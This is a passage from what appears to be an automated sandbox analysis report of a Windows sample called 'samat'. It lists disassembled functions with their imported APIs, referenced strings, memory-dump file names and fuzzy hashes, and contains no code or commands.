RtlCaptureContext.KERNEL32 ref: 00007FF7E12DA68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7E12DA6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF7E12DA6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF7E12DA719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7E12DA723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7E12DA72E

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 84ae083db916b73a3733ca75b8e9d0c1cd0b6ab5210fd16ecbf27b7c1088da8e
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: 06317E32708B8186EB219B25EC417AEB3A8FB88754F944136EA8D47B54DF7CC145CB11

Function 00007FF7E12E1874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E18C0
FindFirstFileExW.KERNEL32 ref: 00007FF7E12E19CA

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction ID: 068de04bf61d9c0822f8e4dbc7e7ab4d78100c12cb94ced40b438c1c9ad3aafc
Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
Instruction Fuzzy Hash: 0BB1B922B1868241EF62AB21DD027B9E398EB44BE4F849137D95D877C5EEBCE441D313

Function 00007FF7E12CD010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7E12CD03C
GetCurrentThreadId.KERNEL32 ref: 00007FF7E12CD04A
GetCurrentProcessId.KERNEL32 ref: 00007FF7E12CD056
QueryPerformanceCounter.KERNEL32 ref: 00007FF7E12CD066

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: f60843e89d54832239beb224f4aa960a89cfab9a1133ce52a4245f55b401e2a9
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 6C114F22B14B068AEB009B60EC453A973A8FB19758F440E36DA2D967A4DF78D1548351

Function 00007FF7E12E3C10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF7E12E3C76
memcpy_s.LIBCPMT ref: 00007FF7E12E3CA1

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: 713b0094705db19463e742113014821ab77241ddace96fd03e16f436a548b779
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 36C10372B1828687D725DF1AE44576AFBA5FB98B84F84C136DB4A83744DB7DE800CB40

Function 00007FF7E12CA474 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7E12CA55B
header crc mismatch, xrefs: 00007FF7E12CA921
unknown header flags set, xrefs: 00007FF7E12CA4C5

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
Instruction ID: 79280f5de30c6dec9e4d93a764b9a01ba98bd3e8dbeaaf76f46c0bdb1e2e3472
Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
Instruction Fuzzy Hash: 10F1A172B083C58BE7A5AB14C889B3EBAADFF44740F55453ADB4947390EBB8E840C751

Function 00007FF7E12E9728 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF7E12E9977
RaiseException.KERNEL32 ref: 00007FF7E12E9988

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction ID: a5ceb7728132f769c6de830a930919b72e15b45cf39dbe1d7d8021e09835ad15
Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
Instruction Fuzzy Hash: 00B16B73A04B898BEB1ACF29C846368BBA4F744B48F54C923DA5E837A4CB79D451C711

Function 00007FF7E12D39A4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7E12D3B12
, xrefs: 00007FF7E12D3D54

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction ID: 457cddd06ff7b9263468ba4f28eeb5228762136aba8e49f6b303ca1b1a111d10
Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
Instruction Fuzzy Hash: 20E1D7B3B0864285E768AF25C85223DB3A8FF45B48F948137DA4E07794DFB9E851C712

Function 00007FF7E12CA2DB Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

incorrect header check, xrefs: 00007FF7E12CA45B
invalid window size, xrefs: 00007FF7E12CA442

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
Instruction ID: f2c23c3aeab695a92ba28ea3b8554688c849d50a7491c0b58db1530ac16a2543
Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
Instruction Fuzzy Hash: FA91B772B182C587E7A49B14C849B7E7AADFF44390F51413ADB4A477C0DB79E540CB12

Function 00007FF7E12DDEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF7E12DDFFD
gfff, xrefs: 00007FF7E12DE07A

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction ID: a08ecce26d999c36c93c4f8293561efca95e520f5088f5c502c7f1daead1a9bb
Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
Instruction Fuzzy Hash: 87516663B186C586E7259E35DC02769EB99E744B94F888233CBAC4BAC5CFBDD000C712

Function 00007FF7E12DDA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF7E12DDD9E

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: 018c8c89095bd9b995e7b4ab2fd0ebddb5c2449a618a81cf1c10c3efc81b4cbd
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 36A14463B08BCA47EB21DF25E8017A9BB98AB51B84F458032DA8D477C5DFBDE401C712

Function 00007FF7E12D8794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF7E12D87B3

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction ID: 43b45d02cdcf3c4dcfe3d5a3d3c5c9e65e890286e9100aaa913d4f4abbb6918b
Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction Fuzzy Hash: 7051B516F0864641FB54B726ED037BAD298AF84BD4FC84036DD5E87795EEBCE4814223

Function 00007FF7E12E3480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7E12E3484

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction ID: 43ed1c0fc6e313ec415b40b22fa43aaa8442699eec2ec09d5f85d6e767777cca
Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction Fuzzy Hash: FAB09220F07A02C6EB0A3B21AC87319A3A87F58700FD8413AC00C80330DEBC20E59722

Function 00007FF7E12D35A0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction ID: d3566d243c7d71e81ff138284e1f12a89b9bd7413a5f73461e3a7989ec88aa19
Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction Fuzzy Hash: F6D1E6A3B0864245EB68AE25C84237DA7A8EF05B48F948236CE0D477D5CFBDD841C762

Function 00007FF7E12C9800 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction ID: 1fffd3d7a928485c52bc120f6c397908cf783486ac3ff2747152caa5e071f33a
Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction Fuzzy Hash: B5C1BD762181E08BD28AEB29E86947A73E1F78930DBD5406BEF87477C5C73CA414DB21

Function 00007FF7E12D2C10 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction ID: ae3eccb638742db52aacdc2674fb5c9e36da16f8ae56941064c3b5d0d8c253e9
Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction Fuzzy Hash: 50B19F73A0879586E764DF29C85133CBBA8E749B48FA60136CA4E47395CFB9E441C722

Function 00007FF7E12DE570 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction ID: a736ba828da0b2f0c4b197252ee1c783870b81d6c1467e6822f5a80bb2d8e34d
Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction Fuzzy Hash: 3E81E473B0878186E774DF19E84237ABA95FB45794F904236DA8D43B99DF7CE4008B12

Function 00007FF7E12E6418 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
Instruction ID: 3e7d7aa017eff4276c6f7716a27d439c39e52d4147534988e5979c07d11ac39d
Opcode Fuzzy Hash: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
Instruction Fuzzy Hash: 1E610B22F1814246F776A6689C1273DD689AF40770F94823BD63DC26C5DEFDE8008B22

Function 00007FF7E12D1944 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 1cec4cd085b6ddcfbe71b14f29efe1aa4f55ba55ad08c5816d406c4b4b72c7c6
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: EC51D633B1865182E7249B29C441378B3A9EB44F58F644132CE8D17BD4DFBAE843D752

Function 00007FF7E12D2164 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 19dbb68356e43bdbe4921cd5abd823035649eac1c0f40b15525c246bae7dc3f9
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 4F51C337B1865182E7649B29C845338B3A8FB54B58F658132DE8C07795CFBAE843C751

Function 00007FF7E12D1D54 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: cd0617aedc3685b13f251ec63b307a8d2d5a033a8d730889618a1b559646e617
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 4451B437B1865186E724AB29C442338B3A4EB55F68F644132CE8D07BD4CBBAE853D751

Function 00007FF7E12D1B50 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

